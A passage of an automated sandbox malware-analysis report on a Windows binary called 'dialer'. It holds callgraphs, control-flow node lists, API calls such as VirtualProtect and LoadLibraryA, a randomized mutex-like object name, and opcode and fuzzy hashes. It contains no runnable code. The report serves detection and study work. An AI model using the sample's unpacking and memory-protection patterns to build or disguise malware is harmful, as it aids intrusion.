2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2366 2920 140001394 2 API calls 2919->2920 2921 140001440 2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2366

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00000001400026E1 1 Function_00000001400031E1 2 Function_00000001400063E1 3 Function_0000000140001AE4 35 Function_0000000140001D40 3->35 78 Function_0000000140001BA0 3->78 4 Function_00000001400014E5 74 Function_0000000140001394 4->74 5 Function_0000000140002FF0 61 Function_0000000140001370 5->61 6 Function_00000001400010F0 7 Function_00000001400062F1 8 Function_00000001400014F4 8->74 9 Function_0000000140001800 69 Function_0000000140002290 9->69 10 Function_0000000140006600 11 Function_0000000140003200 12 Function_0000000140002500 13 Function_0000000140001000 14 Function_0000000140001E00 13->14 42 Function_0000000140001750 13->42 87 Function_0000000140001FB0 13->87 92 Function_0000000140001FC0 13->92 15 Function_0000000140006401 16 Function_0000000140001503 16->74 17 Function_0000000140001404 17->74 18 Function_0000000140002104 19 Function_0000000140001E10 20 Function_0000000140006410 21 Function_0000000140006311 22 Function_0000000140001512 22->74 23 Function_0000000140003220 24 Function_0000000140002320 25 Function_0000000140002420 26 Function_0000000140006620 27 Function_0000000140001521 27->74 28 Function_0000000140001422 28->74 29 Function_0000000140001530 29->74 30 Function_0000000140006630 30->26 31 Function_0000000140001431 31->74 32 Function_0000000140006431 33 Function_0000000140006331 34 Function_000000014000153F 34->74 35->69 36 Function_0000000140001440 36->74 37 Function_0000000140001140 50 Function_0000000140001160 37->50 38 Function_0000000140003240 38->5 38->16 38->26 38->27 38->28 38->29 38->31 38->34 38->36 48 Function_000000014000145E 38->48 49 Function_0000000140002660 38->49 57 Function_000000014000156C 38->57 58 Function_000000014000146D 38->58 38->61 64 Function_000000014000157B 38->64 76 Function_0000000140001599 38->76 84 Function_00000001400015A8 38->84 85 Function_00000001400014A9 38->85 93 Function_00000001400016C0 38->93 99 Function_00000001400027D0 38->99 105 Function_00000001400014D6 38->105 39 Function_0000000140006541 40 Function_0000000140003141 41 Function_0000000140001F47 60 Function_0000000140001870 41->60 43 Function_0000000140001650 44 Function_0000000140002050 45 Function_0000000140002751 46 Function_0000000140006351 47 Function_000000014000155D 47->74 48->74 50->38 50->50 50->60 65 Function_0000000140001880 50->65 68 Function_0000000140001F90 50->68 50->93 51 Function_0000000140001760 107 Function_00000001400020E0 51->107 52 Function_0000000140002460 53 Function_0000000140003160 54 Function_0000000140006461 55 Function_0000000140006561 56 Function_0000000140001E65 56->60 57->74 58->74 59 Function_000000014000216F 62 Function_0000000140001A70 62->35 62->78 63 Function_0000000140002770 64->74 65->25 65->35 65->49 65->78 66 Function_0000000140003180 67 Function_0000000140006381 70 Function_0000000140002590 71 Function_0000000140002790 72 Function_0000000140002691 73 Function_0000000140006491 74->30 106 Function_00000001400068E0 74->106 75 Function_0000000140002194 75->60 76->74 77 Function_000000014000219E 78->35 86 Function_00000001400023B0 78->86 98 Function_00000001400024D0 78->98 79 Function_0000000140001FA0 80 Function_00000001400027A0 81 Function_00000001400031A1 82 Function_00000001400063A1 83 Function_00000001400065A1 84->74 85->74 88 Function_00000001400022B0 89 Function_00000001400026B0 90 Function_00000001400027B1 91 Function_0000000140001AB3 91->35 91->78 94 Function_00000001400062C1 95 Function_00000001400063C1 96 Function_0000000140001AC3 96->35 96->78 97 Function_00000001400014C7 97->74 99->4 99->8 99->16 99->22 99->26 99->47 99->48 99->49 99->61 99->85 99->97 100 Function_00000001400017D0 101 Function_0000000140001FD0 102 Function_00000001400026D0 103 Function_00000001400064D1 104 Function_0000000140001AD4 104->35 104->78 105->74 106->26 108 Function_00000001400017E0 108->107 109 Function_00000001400022E0

                                                        Executed Functions

                                                        Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • NtCloseObjectAuditAlarm.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: AlarmAuditCloseObject
                                                        • String ID:
                                                        • API String ID: 2871759311-0
                                                        • Opcode ID: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                        • Instruction ID: 6e9c43e43475a5412bc82c74bb0b22b7dbbc15337bd8e373d78586065a7e04e3
                                                        • Opcode Fuzzy Hash: 7499237b17bbcd1bcb6ebcadcdfb411da627e67431d6b901ef04fbd3b683fc4c
                                                        • Instruction Fuzzy Hash: BFF05FB6608B408AEA16DF62F85179A77A5F79D7C0F009919BBC857735DB3CC1A0CB40

                                                        Non-executed Functions

                                                        Function 00000001400027D0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 385 1400027d0-14000282b call 140002660 memset 388 140002831-14000283b 385->388 389 1400028fe-14000294e call 14000155d 385->389 391 140002864-14000286a 388->391 396 140002a43-140002a6b call 1400014c7 389->396 397 140002954-140002963 389->397 391->389 393 140002870-140002877 391->393 394 140002879-140002882 393->394 395 140002840-140002842 393->395 398 140002884-14000289b 394->398 399 1400028e8-1400028eb 394->399 403 14000284a-14000285e 395->403 412 140002a76-140002ab8 call 140001503 call 140006620 memset 396->412 413 140002a6d 396->413 401 140002fa7-140002fe4 call 140001370 397->401 402 140002969-140002978 397->402 405 1400028e5 398->405 406 14000289d-1400028b2 398->406 399->403 408 1400029d4-140002a3e wcsncmp call 1400014e5 402->408 409 14000297a-1400029cd 402->409 403->389 403->391 405->399 411 1400028c0-1400028c7 406->411 408->396 409->408 415 1400028c9-1400028e3 411->415 416 1400028f0-1400028f9 411->416 421 140002f39-140002f74 call 140001370 412->421 422 140002abe-140002ac5 412->422 413->412 415->405 415->411 416->403 425 140002ac7-140002afc 421->425 429 140002f7a 421->429 424 140002b03-140002b33 wcscpy wcscat wcslen 422->424 422->425 427 140002b35-140002b66 wcslen 424->427 428 140002b68-140002b95 424->428 425->424 430 140002b98-140002baf wcslen 427->430 428->430 429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 433 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->433 434 140002bca-140002bde 431->434 432->401 453 140002eed-140002f0b call 140001512 433->453 454 140002f10-140002f38 call 14000145e 433->454 434->433 453->454
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                        • String ID: 0$X$\BaseNamedObjects\nrfynzqfftbrthxk$`
                                                        • API String ID: 780471329-1852451468
                                                        • Opcode ID: 15902d1b7b7c1152bf002bcb91e7a227e5a09ce1baa0d3d89b7276a5b6ab46db
                                                        • Instruction ID: f46a43ac56e251243c59ab79ca2c38daa8753cf984a422ac27c1eaf028b3c393
                                                        • Opcode Fuzzy Hash: 15902d1b7b7c1152bf002bcb91e7a227e5a09ce1baa0d3d89b7276a5b6ab46db
                                                        • Instruction Fuzzy Hash: DC125AB2608BC481E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700
                                                        Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: b749f654d0317d9e24de8ca2bf6692fcf531ea681135a2e2bde356a6ec223b5a
                                                        • Instruction ID: 145ef27ce15272fb8ed355f5aa63f0c9a1f5ede9e4593ea7d6eb0f0a7906d2e7
                                                        • Opcode Fuzzy Hash: b749f654d0317d9e24de8ca2bf6692fcf531ea681135a2e2bde356a6ec223b5a
                                                        • Instruction Fuzzy Hash: F55111F1611A4085FB16EF27F9947EA27A1BB8DBD0F449121FB4E873B2DE3884958700
                                                        Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 510 140001cf4-140001cfe call 140001d40 503->510 511 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->511 504->505 507 140001c04 504->507 505->502 505->503 509 140001cd7-140001cf3 memcpy 507->509 515 140001d03-140001d1e call 140001d40 510->515 511->515 517 140001c72-140001c79 511->517 518 140001d23-140001d38 GetLastError call 140001d40 515->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->509 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 28aadb8de5dc709acd0a0e5d247f6037aa628613dfc42422a511b90ca232dc4a
                                                        • Instruction ID: 2ed46510ed1d0a58bb00a12b4a38f7601a8ffa55d26e4d8577210080af0f0105
                                                        • Opcode Fuzzy Hash: 28aadb8de5dc709acd0a0e5d247f6037aa628613dfc42422a511b90ca232dc4a
                                                        • Instruction Fuzzy Hash: 064132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
                                                        Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: dc48a205a360e40ccc39e5e09ba110344913a208c188809db43705c9a7f6a856
                                                        • Instruction ID: 9494385bac82c96470a5ad2ca80031d016a952209e6f2660f35a807c86e33b41
                                                        • Opcode Fuzzy Hash: dc48a205a360e40ccc39e5e09ba110344913a208c188809db43705c9a7f6a856
                                                        • Instruction Fuzzy Hash: 9121F5B0305A0192FA6BDB53F9483E823A4BB6CBD0F444121FF5A476B4DB79C986C300
                                                        Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006be0 553->557 560 140001f43-140001f45 554->560 561 140001f2f-140001f3f 554->561 555->554 558 140001ee4-140001ee8 555->558 556->548 562 140001ec0 556->562 557->554 566 140001f0c-140001f10 557->566 563 140001eea-140001ef9 signal 558->563 564 140001f4e-140001f53 558->564 560->548 561->560 562->554 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                        • Instruction ID: 0d0cdd76e27464eab58c3101b34b7ecc2a8ef26ebffc61dfa6a838f535d4530f
                                                        • Opcode Fuzzy Hash: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                        • Instruction Fuzzy Hash: 0E2159B1A0510542FA77DA2BB5903F92182ABCC7E4F258635FF19873F5DF7888C28241
                                                        Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 584 140001a20-140001a26 580->584 585 140001956-140001961 581->585 586 14000199e-1400019a6 581->586 582->581 583 14000192b-14000193a 582->583 583->579 589 140001b87-140001b98 call 140001d40 584->589 590 140001a2c-140001a37 584->590 587 140001970-14000199c call 140001ba0 585->587 586->572 588 1400019a8-1400019c1 586->588 587->586 594 1400019df-1400019e7 588->594 590->586 591 140001a3d-140001a5f 590->591 595 140001a7d-140001a97 591->595 596 1400019e9-140001a0d VirtualProtect 594->596 597 1400019d0-1400019dd 594->597 600 140001b74-140001b82 call 140001d40 595->600 601 140001a9d-140001afa 595->601 596->597 597->572 597->594 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->595 613->609 614->600
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                        • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                                        • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                        • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                        Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                        • Instruction ID: 497f2bda4b805bebb598d258fe75f44a47035596d1a2b2a7541446a23c8471c2
                                                        • Opcode Fuzzy Hash: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                        • Instruction Fuzzy Hash: 61F0F671A14A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C310
                                                        Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.3126776839.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002A.00000002.3126385510.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127214809.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127581724.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002A.00000002.3127971405.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                        • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                                        • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                        • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300

                                                        Execution Graph

                                                        Execution Coverage:56.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:87.5%
                                                        Total number of Nodes:8
                                                        Total number of Limit Nodes:1

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                        Executed Functions

                                                        Function 00000001408460F0 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 